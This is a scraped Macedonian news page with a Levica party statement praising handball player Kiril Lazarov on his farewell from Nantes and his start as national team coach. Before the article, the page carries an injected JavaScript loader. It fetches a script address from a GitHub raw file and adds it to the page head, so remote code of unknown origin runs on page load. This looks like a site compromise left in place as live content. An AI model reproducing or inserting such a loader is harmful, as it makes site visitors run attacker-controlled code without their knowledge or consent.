;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица: Ова е само нов почеток за Лазаров - даваме поддршка со верба дека ќе донесе уште многу радост за Македонија - Антропол
АктуелноЛокално

Левица: Ова е само нов почеток за Лазаров – даваме поддршка со верба дека ќе донесе уште многу радост за Македонија

  • Соопштение на Левица – Сектор спорт

Величествено испраќање на величествениот Кирил Лазаров.

Кире Лазаров е жива легенда на македонскиот спорт, вистински пример за синонимот ‘амбасадор’ на Македонија, кој се употребува за карактеризирање на спортистите.

Лазаров беше испратен од францускиот „Нант” како крал – кралска круна, трон, оган, овации одекнуваа во салата по завршувањето на последниот домашен меч на Лазаров за „Нант“. Публиката носеше круни на своите глави во негова чест.

Директорот на „Нант“ изјави:

“Гордост е што кај нас имавме човек како Кирил Лазаров.”

Најдобриот ракометар во историјата на овој спорт. Најдобриот стрелец во лигата на шампиони, на европските и светските првенства. Ти благодариме за сè што направи за овој народ.

Македонија ќе гледа уште многу од Кире Лазаров. Ова е само крај на едно поглавје за него во спортот. Но, оттука почнува ново, со неговата лидерска улога како тренер на репрезентацијата со која силно веруваме и даваме поддршка дека ќе ни донесе уште многу радосни мигови, светски, европски и можеби и олимписки титули.